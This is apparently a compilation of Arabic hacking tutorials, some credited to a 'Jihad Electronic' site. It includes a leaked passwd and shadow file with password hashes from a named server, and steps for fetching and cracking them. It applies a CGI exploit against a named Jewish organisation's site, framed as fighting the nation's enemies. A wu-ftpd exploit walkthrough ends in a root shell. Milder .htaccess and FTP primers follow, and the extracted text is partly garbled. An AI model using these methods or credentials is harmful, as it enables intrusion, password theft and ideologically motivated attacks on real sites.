           ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬
 ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬
                                            ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬
‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬
                       ‫:/:‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody‬‬


                                              ‫512‬
                                       noaccess:x:60002:60002:No Access User:/:
                                     nobody4:x:65534:65534:SunOS 4.x Nobody:/:

                                                          www:x:102:1001::/web:/bin/csh
                           mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
                                              sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
       jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
                                  landmark:x:1000:1000::/web/landmark:/bin/ksh
     ------------------------------------------------------------------------------------------------
 ‫ نعرف من خالل الجدول السابق ذكره بأن كلمة المرور الصحيحه في‬x ‫ الموضح واللي هو‬token ‫ومن الـ‬
                                                                               /etc/shadow ‫الدليل‬

                                                                 ‫إذن نتوجه بالمتصفح الى‬
                                      http://wilsonweb2.hwwilson.com/etc/shadow

                                                                                    ‫لنحصل على الملف‬
     ------------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445::::::
    sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445::::::
                        uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*:::::::
       nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445::::::
      www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911::::::
          sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601::::::
 admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976::::::
       erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185::::::
     ------------------------------------------------------------------------------------------------
‫ في ملف الباسورد ، وهكذا مع جميع الحسابات‬x ‫نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان عالمه‬
                                     ‫لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر‬

                                                                                   -: ‫مالحظه مهمه‬
                              ... ‫عليك جعل كل حساب في سطر ، يعني تربتها لتتعرف عليها برامج الكسر‬




                                                                              -: ‫مواقع تستحق الزياره‬


                                                                       ‫أرشيف لثغرات‬
                                        www.securiteam.com/exploits/archive.html

                                                                               ‫أرشيف لثغرات‬
                                                               http://www.ussrback.com/

                                                                         ‫أرشيف ثغرات + الكثير‬
                                                             http://www.secureroot.com/




                                                216
                                                 ‫أرشيف ثغرات‬
                                 http://www.rootshell.com/

                                                 ‫أرشيف ثغرات‬
                                 http://www.ussrback.com/

                                              ‫مواقع لثغرات‬
                   www.secureroot.com/category/exploits

                                            ‫دليل لمواقع الهاكينق‬
                                www.hitboss.com/Hacking

                                       ‫محرك بحث ال غني عنه‬
www.undergroundnews.com/resources/s...ound/search.asp

                                  Warez.com-Underground
                                   http://www.warez.com/

                                                        Hacking
                                            )‫)ممتاز لمن يريد البدايه‬

                               http://www.neworder.box.sk/

                                    Security Search Engine
                                   http://www.bugs2k.com/

                                                 insecure
                                  http://www.insecure.org/


                                  </XMP></BODY></HTML>

  http://public.www.easynet.co.uk/cgi...ail/formmail.pl


                    ،،،‫انتهى‬




" )‫" اختراق المواقع (الجزء الثالث‬



                     217
                                                               ‫<منقول من موقع الجهاد اإللكتروني>‬

                               ‫اخواني عالم االختراق كبير جدا ...وبسيط جدا جدا النه من صنع البشر‬

                       ‫كوني احد االعضاء في هذا المنتدى وجديد في باب االختراق عن طريق الثغرات‬

                                 ‫وحتى تحصل الفائده للجميع ونتعلم من بعض ..فليس عيبا طلب العلم‬

                                      ‫انما العيب الجهل والتعالي بالعلم نحن نتعلم ال لنجابه العلماء بل‬

                                            ‫لننفع امتنا ونرفع رايتها ونقف في وجه من يعاديها .....‬

                                    ‫في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس‬

                              ‫يبي متابعه وشوية جهد انا ساطر ح بعض االسئله لعل االخوان المشرفين‬

                                                              ‫او الكتاب يساعدونا في الموضوع ....‬

                            ‫من خالل قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور‬

   ‫*لن تخترق الموقع )‪ (host‬اللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي‬


‫*لن تخترق السيرفر حتى تمتلك ملف الصالحيات )‪ (passwd‬اللي هو حق الحسابات للمواقع المستأجره‬

    ‫عند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي /‪etc/passwd‬‬

‫احيان يكون اسمه ‪ shadow‬ويعني ان كلمة المرور نجمه او اكس او عالمة تعجب اما ‪ passwd‬فتأتي‬
                                                                                   ‫فيه‬

  ‫الكلمه مشفره وتستخدم لها ‪ john the ripper‬اللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين‬

                                                             ‫على حسب علمي مافيه برنامج لها ؟؟؟‬

                       ‫فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟‬

  ‫واذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام )‪ (pwd‬او (اي صيغه) ؟‬

       ‫بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ النه كما معروف ان اليونكس‬

                                                                                     ‫له ست مجلدات‬

                                             ‫‪ bin‬خاص بالملفات الثنائيه يعني اللي تشغل النظام‬
               ‫‪ etc‬ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او ‪passwd‬‬
                                                                            ‫‪ dev‬ملفات االجهزه‬
                                      ‫‪ lib‬مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل‬
                                                           ‫‪ tmp‬الملفات الموقته او غير الثابته‬
                                  ‫‪ usr‬اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام‬

    ‫هل يعني ذلك لو ان السيرفر فيه نظام ‪ nt‬اقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس‬


                                           ‫812‬
                       ‫زي اللي موجوده في ‪ nt‬ام تختلف واسم الملف يختلف ‪ admin.pwd‬مثال‬

                    ‫*بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى‬

                ‫ومن اشهرها ثغرات السي جي اي نسبة للمجلد ‪ cgi-bin‬او ملفات من امتداد ‪cgi‬‬

                                                                        ‫ماعلينا ليش سموها ؟؟؟‬

       ‫طيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغره ‪php.cgi‬ونريد‬

‫تطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثال /‪ http://www.jewish.org‬نفعل التالي‬

‫/‪http://www.jewish.org‬ثم نكتب /‪ cgi-bin‬ثم الثغره ‪ php.cgi‬بحيث تصبح الخطوات بعد‬
                                                                         ‫تجميعها‬

 ‫‪http://www.jewish.org/cgi-bin/php.cgi‬الكالم هذا كله في المستعرض عندك في حقل‬

                                                                                ‫االدرس العنوان‬


   ‫انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها‬


                          ‫ان ممكن تكون الثغره بمجلد ثاني اسمه ‪ scripts‬وتصبح الثغره السابقه‬

                                         ‫‪http://www.jewish.org/scripts/php.cgi‬‬

                                                       ‫‪scripts‬خاص بسيرفرات فيها ‪winnt‬‬

                                         ‫‪cgi-bin‬خاص بسيرفرات يونيكس او ايريس او لينكس‬



          ‫للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل االبلت جافا‬



                          ‫اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض.‬




                                        ‫انتهى،،،‬



          ‫" درس في اختراق المواقع (متوسط) "‬



                                         ‫912‬
                                                                               ‫<منقول>‬
                                                                         ‫<الكاتب: ‪> ICER‬‬

             ‫االدوات المطلوبه : شيل اكاونت ...اذا بحثت في جوجل سوف تجد الكثير من الشيلز‬
              ‫طبعا الناس المحترمه (احمممم) بتركب لينكس او يونيكس و تعيش حياتها و تريح‬
              ‫نفسها...في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي‬

                                                        ‫انا عن نفسي مش حاستعمل االتنين :)‬
                 ‫بس بالنسبه للي حيستعملو الشيل الزم يتاكدو انه بيسمح بالبرامج االساسيه زي‬
                    ‫‪nslookup, host, dig, ping, traceroute,telnet, ssh, ftp‬‬
       ‫و اساسي الزم ال ‪ gcc‬عشان تعرف تعمل كومبايل...(يا عم ركب لينكس و ريح نفسك )‬
                    ‫و طبعا االدوات دي ‪ nmap and netcat‬و اخر حاجه هي االكسبلويت .‬
                                                                   ‫*بعض الملحوظات الهامه :‬
       ‫2-الشيل اكاونت شبيه جدا بالدوس مع اختالف في االوامر و الوظائف ..مش حناقش كيفيه‬
                                      ‫الحصول على واحد الن فيه مواضيع كثيره اتكلمت عليه.‬
                                        ‫6- اداه ال ‪ nmap‬هي عباره عن بورت سكانر متقدم‬
                       ‫3- ال ‪ NetCat‬هي اداه شبيه بالتلنت و تقوم برفع بيانات لسيرفير معين‬
                 ‫.-االكسبلويتات هي عباره عن برامج غالبا تكون مكتوبه بلغه السي و هي تقوم‬
              ‫باعطائك كافه الصالحيات فهي تخترق جهاز معين و تقوم بعمل كل شيء انت تريده‬
                                                                         ‫ممكن تالقيها فين؟؟؟‬
           ‫مواقع السيكيوريتي على افه من يشيل...دور و لو مالقيتش قولي و انا اديلك كام موقع‬
                                                                    ‫تجيب منه الحاجات دي....‬
                                                               ‫*المواقع المرتبطه بالموضوع :‬
                                        ‫‪)a) Linux (http://www.slackware.com‬‬
                                           ‫‪)b) Nmap (http://www.insecure.org‬‬
                           ‫‪)/c) NetCat (http://www.l0pht.com/~weld/netcat‬‬

                                                                          ‫الخطوات :-‬
                     ‫2- ركب الينكس و خش عالنت (مش قلتلك مفيش احسن من اللينكس :‪) P‬‬
                                                   ‫6- ركب االداه ‪ nmap‬متبعا التالي :‬
                                                      ‫*2) ‪tar zxvf nmap.tar.gz‬‬
                                                                     ‫6) ‪cd nmap‬‬
                                   ‫3) ./‪configure && make && make install‬‬

                                                         ‫3-شوف الموقع المستهدف و ليكن ..‬
                                                                     ‫‪www.target.com‬‬
                                                       ‫.- شوف االي بي تبع الموقع باستخدام‬

                                                       ‫‪nslookup www.target.com‬‬

                                     ‫هذا سوف يعرض لك االي بي للموقع و ليكن 3.6.2.282‬
            ‫5- شوف الخدمات اللي بيقدمها الموقع و كمان شوف نظام التشغيل متبعا التالي :-‬

                                                          ‫"3.2.1.691 ‪"nmap -sS -O‬‬

                                     ‫المفروض انه يديك مخرجات شبه الكالم ده :-‬
                                 ‫3.2.1.691 ‪root@IcEr:~# nmap -sS -O‬‬
        ‫‪) /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap‬‬
                   ‫3.2.1.691( ‪:)Interesting ports on www.target.com‬‬
‫(‪)The 1531 ports scanned but not shown below are in state: closed‬‬


                                      ‫022‬
                                                       Port State Service
                                                          tcp open ftp/62
                                                        tcp open smtp/65
                                                         tcp open http/02
                                                   tcp open sunrpc/222
                                                       tcp open auth/223
                                                    tcp open printer/525
                                                 tcp open unknown/823
                                                     tcp open kdm/226.
                                                tcp filtered krb524/....
                                                      tcp open X11/2222
                                               tcp filtered napster/2288
                                 OS guess for host: Linux 2.2.14-2.2.16
                  )Uptime 0.160 days (since Mon Apr 30 14:51:06 2001
  Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
                                                            #~:root@IcEr




                                                                            ): ‫تمام كده يا شباب‬
                                                                                        ...‫نكمل‬
    FTP ‫الكالم ده كله عباره عن استكشاف للموقع يوريك البورتات المفتوحه..ممكن تشوف لو كان فيه‬
                                                                                    daemon
                           ‫شغال على الموقع و ال ال في المثال اللي فوق حنالقيه موجود و ده كويس‬
                                  -: ‫ موجوده متبعا التالي‬FTP daemon ‫شوف اي فيرحين من‬
                                                                  "telnet 196.1.2.3 21"
                                                                                             ‫او‬
                                                                           "ftp 196.1.2.3"
                ‫اي منهم حيديك بانر فيه الفيرجين بتاعه االف تي بي ديمون اللي شغاله على السيرفير‬
                                                                          : ‫ممكن يكون زي كده‬

                                                 root@IcEr:~# ftp 196.1.2.3
                                                    .Connected to 196.1.2.3
www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 662
                                                                )SAST 2000
                                                                      .ready
                                            Name (target:root): anonymous
    .Guest login ok, send your complete e-mail address as password 332
                                                                 :Password
 Welcome, archive user! This is an experimental FTP server. If have -632
                                                                         any
                  unusual problems, please report them via e-mail to -632
                                                     root@IcEr.pandora.net
      If you do have problems, please try using a dash (-) as the first -632
                                                                  character
of your password -- this will turn off the continuation messages that -632
                                                                         may
                                           .be confusing your ftp client-632
                                                                        -632


                                            221
                                  .Guest login ok, access restrictions apply 632
                                                   .Remote system type is UNIX
                                            .Using binary mode to transfer files
                                                                           ftp>by
                                                                    #~:root@IcEr

                                    .wu-2.6.0 ‫من الكالم ده تقدر تعرف ان الفيرجين الموجوده هي‬
                      ); ‫ و كانت اعمليه ناجحه‬anonymous ‫و ايضا احنا حاولنا نخش كمجهولين‬
                                              ####### ‫####### صلي على الحبيب المختار‬

                                                       -: ‫1 او 0 مش فاكر المهم انها اهم خطوه‬
                                        .FTPd ‫احصل على االكسبلويت بتاعه الفيرجين ديه من‬
                                                                 ) ‫(اللي يعمل سيرش ميتوهش‬
                                                                   wuftpd2600.c ‫و لتكن‬
 red hat 6.2 ‫المهم لو شفت السورس كود بتاعها حتالقي انها متكوده عشان نظام تشغيل معين و ليكن‬
                                  ‫و يا سالم لو كان الموقع المستهدف بيعمل على نظام التشغيل ده‬
                         ‫كده يبقى كل اللي تعمله انك تعمل كومبايل للثغره دي و بشغلها على سيرفر‬
                                                root access ‫الموقع المستهدف و كده حيديك‬
                                                                                          )-;
                                   root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
  Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1)
                                                                                 from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
                                                                  ..loggin into system
                                                                                  USER ftp
  .Guest login ok, send your complete e-mail address as password 332
                                                                    >PASS <shellcode
       Next time please use your e-mail address as your password-632
                                                     for example: icer@ae.net -632
                               .Guest login ok, access restrictions apply 632
                           STEP 2 : Skipping, magic number already exists:
                                                            ][87,01:03,02:01,01:02,04
 STEP 3 : Checking if we can reach our return address by format string
)STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now
                 .STEP 5 : Sending code.. this will take about 10 seconds
                                                               Press ^\ to leave shell
  Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
                                                                                 unknown
                        )uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp
                                                                !Bang! You have root


                                                        ‫طبعا انا نسيت امر الكومبايل ..شوف االمر ده‬
                                                                                      man gcc
                            ‫و هوه حيديلك معلومات كامله عن امر الكومبايل ..بكل الخيارات اللي معاه‬
                                                                 ): ‫كده يبقى انا كده عملت اللي عليه‬
                                          ‫محدش يسالني باه بعد كده و يقولي ياواد يا ايسر اعمل ايه‬
                                                     search..U will find what U wanna
                  ..‫طيب ...اه نسيت ..محدش سالني اعمل بالنت كات بعد كده ..بعض الثغرات بتحتاجه‬
              ‫ الموجوده ..الكن لو كانت الخاصيه‬annonymous ‫لو الحظت اننا استغلينا خاصيه ال‬


                                             222
                                             ‫دي مش موجوده ..يبقى مش حنعرف نكمل الكالم ده‬
‫عشان االكسبلويت مش تشتغل ..في هذه الحاله االكسبلويت مش تشتغل اال لو معانا باسورد و يوزر نيم‬
                                                      ‫عشان نخش على االف تي بي بتاع الموقع..‬
               ‫عشان كده الزم تقرا السورس بتاع االكسبلويت..و كل اكسبلويت لها ساينتكس و شغل‬
                                                        ‫خاص بيها..بس المبادئ االساسيه و احده.‬

                                       ‫انتهى،،،‬




                           ‫" شرح ملف ‪" htaccess‬‬

                                                                                ‫<منقول>‬
                                                                      ‫<الكاتب: ‪> BSD-r00t‬‬


                                         ‫322‬
                                                          ‫|‬                                ‫| * مقدمـــة‬
                                                  ‫|‬                      ‫| * اهمية ملف .‪htaccess‬‬
                                                ‫|‬                   ‫| * كيفية عمل ملف .‪htaccess‬‬
                                                ‫|‬                      ‫| * عمل صفحات ‪ error‬خاصة‬
                                            ‫| * منع عرض محتويات المجلد الذي ال يوجد به ‪| index‬‬
                                                ‫|‬           ‫| * منع/اتاحة دخول الموقع الشخاص معينة‬
                                                    ‫|‬          ‫| * تحويل من يحاول فتح لينك للينك اخر‬
                                                ‫|‬                       ‫| * عمل الملف ‪.htpasswd‬‬
                                                  ‫|‬                  ‫| *الحماية بواسطه .‪htaccess‬‬
                                                 ‫|‬                 ‫| * منع اظهار الملف .‪htaccess‬‬
                                                    ‫|‬                  ‫| * اضافة مستخدمين في الملف‬
                                                    ‫|‬              ‫| * جعل الصفحات تظهر بامتداد اخر‬
                                                    ‫--------------------------------------------------‬

                                                                                      ‫* مقدمـــة‬
                                                                                    ‫------------‬
 ‫من اهم وسائل حماية المواقع و اغالق بعض االجزاء فيه بكلمة سر , و منع بعض الناس من دخل الموقع و‬
                                                                                         ‫السما ح‬
               ‫لغيرهم بالدخول .. هو استخدام الملف .‪ htaccess‬و الذي يمكن عمل الكثير و الكثير به .‬
                                                             ‫و هذا الملف مخفي و محمي بكلمة سر‬


                                                                       ‫* اهمية ملف .‪htaccess‬‬
                                                                            ‫-----------------------‬
                                                                   ‫2- حماية اي جزء فيه بكملة سر‬
                                                                ‫6- عمل صفحات ‪ error‬خاصة بك‬
                                              ‫3- منع عرض محتويات المجلد الذي ال يوجد به ‪index‬‬
                                                         ‫.- منع/اتاحة دخول الموقع الشخاص معينة‬
                                              ‫5- جعل صفحة البداية بأمتدادات غير .‪.. html , .asp‬‬
                                                            ‫2- تحويل من يحاول فتح لينك للينك اخر‬


                                                                    ‫* كيفية عمل ملف .‪htaccess‬‬
                                                                       ‫---------------------------‬
    ‫يمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "‪ "Notepad‬عن طريق عمل للملف‬
                                                                                 ‫حفظ باسم و نحفظ‬
‫الملف بهذا االسم .‪ htacces‬على ان يكون ليس امتداده .‪ txt‬اي ان ليس هناك اسم للملف , اذا لم تستطيع‬
                                                                                               ‫ذلك‬
                               ‫احفظ الملف باسم ".‪ - "htaccess‬عالمتي التنصيص في اسم الملف - .‬


                                                                       ‫* عمل صفحات ‪ error‬خاصة‬
                                                                           ‫------------------------‬
     ‫و الفائدة منها هو ان الموقع يظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على الموقع‬
                                                                                   ‫سوف يظهر كان‬
    ‫الموقع به كل الثغرات و ذلك الن طريقة عمل السكانر هي انه يقوم بتطبيق كل ثغره على الموقع و يرصد‬
                                                                                            ‫النتيجه‬
                                         ‫فاذا كان هناك اي تغير يظهر لك كأن الموقع عليه هذه الثغره .‬
                                             ‫و يمكنك عمل صفحات ال ‪ error‬الخاصه ك عن طريق :-‬


                                               ‫422‬
                                                                 ‫أ- تصميم صفحات ال ‪ error‬اوال‬
                                                                  ‫ب- تحميل الصفحات على الموقع‬
                                                       ‫ج- اضافه السطر التابي في الملف .‪htaccess‬‬
                ‫‪ErrorDocument error_num‬‬
                                                                          ‫‪directory_file‬‬
     ‫بخيث يكون ‪ error_num‬هو رقم الخطا " االرقام موجود بالسفل " و ‪ directory_file‬هو مكان‬
                                                                        ‫صفحه ال ‪ error‬التي‬
                                                                              ‫قمت بتصميمها .‬
                    ‫404 ‪ErrorDocument‬‬                                                  ‫مثال :‬
                                                                   ‫‪/errors/nfound.html‬‬

                                                                             ‫ال ‪ errors‬و ارقامها : -‬

                                                                            ‫-----------------------‬
                                                                        ‫| 22. | ‪| Bad Syntax‬‬
                                                                            ‫-----------------------‬
                                                                       ‫| 22. | ‪| Unauthorized‬‬
                                                                            ‫-----------------------‬
                                                                          ‫|‬ ‫| 62. | ‪Not Used‬‬
                                                                            ‫-----------------------‬
                                                                         ‫| 32. | ‪| Forbidden‬‬
                                                                            ‫-----------------------‬
                                                                         ‫| .2. | ‪| Not Found‬‬
                                                                            ‫-----------------------‬

                                              ‫* منع عرض محتويات المجلد الذي ال يوجد به ‪index‬‬
                                                    ‫-----------------------------------------------‬
‫بعض المواقع عند محاولة فتح اي دليل عليها و ال يكون به ملف ‪ index‬يقوم الموقع بسرد جميع محتويات‬
                                                                                          ‫هذا الدليل‬
                                                               ‫و لحل هذه المشكله توجد طريقتين :-‬
                                  ‫أ- وضع ملف ‪ index‬في كل المجلدات " و بالطبع هذا صعب جدا "‬
                        ‫ب- باستخدام الملف .‪ htaccess‬عن طريق اضافه السطر التالي في الملف :-‬
            ‫‪Options -Indexes‬‬


                                                            ‫* منع/اتاحة دخول الموقع الشخاص معينة‬
                                                                 ‫-------------------------------------‬
 ‫يمكنك باستخدام الملف .‪ htaccess‬منع شخص معين من دخول الموقع بعد معرفة االي بي الخاصه به و‬
                                                                                       ‫يمكنك االتسفاده‬
 ‫من ذلك حيث يمكنك منع دخل الموقع لمن ال تريد كما يمكنك منع دخول الموقع الي شخص في اسرائيل مثال‬
                                                                                                    ‫..‬
                                              ‫و يمكنك ذلك عن طريق اضافة السطر التالي في الملف : -‬
      ‫???.???.???.??? ‪deny from‬‬
                                                     ‫حيث ان ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هو االي بي الخاص به .‬
                                  ‫واذا اردت منع اي احد من دخول الموقع يمكنك اضافة السطر التالي :-‬
                 ‫‪deny from all‬‬
                      ‫واذا اردت السما ح لشخص معين بدخول الموقع يمكنك ذلك باضافة السطر التالي :-‬
               ‫؟؟؟.؟؟؟.؟؟؟.؟؟؟ ‪allow from‬‬
                                                        ‫حيث انا ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هو االي بي الخاص به‬



                                                ‫522‬
                                                                 ‫* تحويل من يحاول فتح لينك للينك اخر‬
                                                                  ‫-------------------------------------‬
   ‫وتسمى هذه العمليه ب ‪ Redirection‬وهي من اهم فوائد .‪ htaccess‬الملف تستخدم مثال عند تغير‬
                                                                                        ‫موقع ملف قديم‬
   ‫على الموقع الى مكان جديد فيمكنك باستخدام الملف .‪ htaccess‬عند محاولة احد فتح احد الينك القديم‬
                                                                                                  ‫توجيه‬
                                             ‫الى الينك الجديد عن طريق اضافة السطر التالي في الملف :-‬
                          ‫???.???/ ???.???/‪Redirect /somewhere‬‬
                                                        ‫‪http://www.site.com/newlocation‬‬
                                     ‫بحيث يكون /‪ ???.???/somewhere‬هو مكان الملف القديم و‬
                                  ‫‪ ???.???/http://www.site.com/newlocation‬هو مكان‬
                                                                                          ‫الملف الجديد.‬
                                                                                             ‫----------‬

                                                                      ‫* عمل الملف ‪.htpasswd‬‬
                                                                         ‫------------------------‬
          ‫ويمكنك تقوم بعمله بنفس طريقة الملف .‪ , htaccess‬و سوف نعمله تى نسطيع استخدام الملف‬
                                                                                   ‫.‪htaccess‬‬
                                        ‫في الحماية و سوف نكتب في الملف ‪ htpasswd‬ما يأتي :-‬
          ‫1‪user1:EncryptedPwd‬‬
              ‫2‪user2:EncryptedPwd‬‬
                                                   ‫‪ o‬حيث ان 2‪ user1 , user‬هو اسم المستخدم .‬
   ‫‪ o‬و 2‪ EncryptedPwd1 , EncryptedPwd‬هي كلمات السر ولكن مشفره و يمكنك تشفير اي‬
                                                                                      ‫كلمة تريدها‬
                                                                              ‫عن طريق الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
                                                                                               ‫او‬
                                    ‫-‪http://www.e2.u‬‬
                                                           ‫‪net.com/htaccess/make.htm‬‬
    ‫فمثال لو اردنا وضع يوسر باسم ‪ Security‬و كلمة السر الخاصة به هي 3‪ fu93hds‬نذهب اوال الى‬
                                                                                           ‫الموقع‬
‫‪euronet.nl/~arnow/htpasswd.http://www‬‬
                                                                 ‫‪ o‬و ‪username : Security‬‬
                                    ‫‪ o‬و 3‪passwrod & re-enter password : fu93hds‬‬
            ‫‪ o‬و نضغط على الزر ‪ claculate‬لتظهر النتيجه --> ‪Security:893bNicBcwszw‬‬

          ‫و االن قد اتممنا عمل الملف .‪ htaccess‬و الذي قمنا بعمله و ذلك لكي نستطيع استخدام الملف‬
                                                                                     ‫.‪htaccess‬‬
                                                                        ‫للحماية بكلمة سر و يوسر .‬
                                                                    ‫* الحماية بواسطه .‪htaccess‬‬
                                                                       ‫----------------------------‬
  ‫و تعتبر الفائدة الرئيسية للملف حيث انه يمكن منع اي احد من دخول دليل معين في الموقع اال اذا كان معه‬
                         ‫كلمة السر و اليوسر نيم , فيمنكنك عن طريقها عمل منتدى خاص او اي شئ تريد.‬
   ‫فعند وضع الملف .‪ htaccess‬في اي دليل و حاول احد دخول هذا الدليل او اي جزء يندرج تحته سوف‬
                                                                                          ‫يطلب منه‬
                                                                                 ‫كلمة سر و يوسر .‬

             ‫و يمكنك عمل ذلك عن طريق اضافة ما يأتي في الملف قبل نسخه في الدليل المراد حمايته :--‬



                                                ‫622‬
 ‫‪AuthUserFile /somewhere/.htpasswd‬‬
  ‫" ‪AuthName "Enter your user and passed‬‬
                                                                                           ‫‪please‬‬
              ‫‪user-Require valid‬‬
              ‫‪AuthType Basic‬‬


           ‫<‪>Limit GET POST‬‬
              ‫‪require valid-user‬‬
                  ‫</‪>Limit‬‬
             ‫‪ o‬بحيث يكون ‪ /somewhere/.htpasswd‬هو مكان ملف .‪ htpasswd‬على موقعك‬
  ‫‪ o‬و يكون ‪ Enter your user and passed please‬هي الرساله التي سوف تظهر لتطلب كلمة‬
                                                                            ‫السر‬

                                                                    ‫* منع اظهار الملف .‪htaccess‬‬
                                                                        ‫-----------------------------‬
      ‫قد عرفنا االن ان لهذا الملف اهميه كبيره فيجب علينا ان نحميه جيدا , فالبرغم من ان الملف مخفي اال‬
                          ‫انه غير سالم من ان يكون السرفر نفسه غير مؤمن او انه هناك تصريح خطأ ..‬
                                         ‫لذلك سوف نمنع عرض هذا الملف عن طريق اضافة ما يأتي : -‬

              ‫<‪>Files .htaccess‬‬
              ‫‪order allow,deny‬‬

                 ‫‪deny from all‬‬
                   ‫</‪>Files‬‬
                                             ‫فاذا حاول احد عرض الملف سوف يظهر له 304 ‪. error‬‬


                                                                 ‫* جعل الصفحات تظهر بامتداد اخر‬
                                                                   ‫-------------------------------‬
        ‫ويمكن باستخدام هذه الخاصية عمل ملف يظهر كأن امتداده .‪ html‬و لكنه ذو امتداد .‪ txt‬مثال .‬
                                                                            ‫باضاف السطر التالي :-‬
         ‫‪AddType text/plain html‬‬
                                       ‫ويمكنك رؤية كافى التغيرات التي يمكنك عملها في هذا الملف :-‬
‫‪http://www.pharaonics.net/books/MIME.txt‬‬

                                              ‫انتهى،،،‬




                        ‫" نظام نقل الملفات ‪" FTP‬‬

                                                                          ‫<منقول من منتدى إعصار>‬
                                                                                ‫<الكاتب: الجوكر>‬


                                               ‫722‬
                                                                           ‫ما هو نقل الملفات ‪ FTP‬؟‬


 ‫‪FTP‬هي اختصار لكلمة ‪ File Transfer Protocol‬وتعني بروتوكول نقل الملفات، وهذه الخدمة هي‬
     ‫احدى تسهيالت ‪ TCP/IP‬التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات‬
  ‫‪FTP‬الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم‬
 ‫تشغيل مختلفة وعليه فلديها أشكال ‪ Formats‬مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم‬
   ‫به ,‪ FTP‬وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفا ً في أميركا الى جهازنا .‬

                                                                                   ‫أقسام نقل الملفات:‬

                                                                        ‫نقل الملفات ينقسم الى قسمين:‬

                                                                         ‫تنزيل الملفات:‪Download‬‬

                            ‫وهو جلب الملفات من الكمبيوتر المضيف ‪ Host‬الى الجهاز المحلي.‪Local‬‬

                                                                            ‫ارسال الملفات:‪Uplaod‬‬

                        ‫وهو ارسال الملفات من الكمبيوتر المحلي ‪ Local‬الى الكمبيوتر المضيف.‪Host‬‬

                                                        ‫ومن الناحية األمنية فهناك نوعان لنقل الملفات:‬

                                                                          ‫نقل مؤمن:‪Secure FTP‬‬

           ‫تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.‬

                                                                  ‫نقل مجهول:‪Anonymous FTP‬‬

‫التحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالبا ً استخدام ‪ guest‬أو ‪ anonymous‬عوضا ً‬
                                                                                   ‫عنهما.‬

                                                  ‫تصنف مصادر البرامج على االنترنت الى ثالثة أقسام:‬

                                                                     ‫ملكية عامة:‪Public Domain‬‬

      ‫وضعت البرامج هنا لالستخدام العام فليس هناك حقوق ملكية ألحد وال قيود على استخدامها وتوزيعها‬
                                                                                         ‫وتعديلها.‬

                                                                         ‫مصادر مجانية:‪Freeware‬‬

   ‫يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر وال يجوز تعديلها أو بيعها.‬

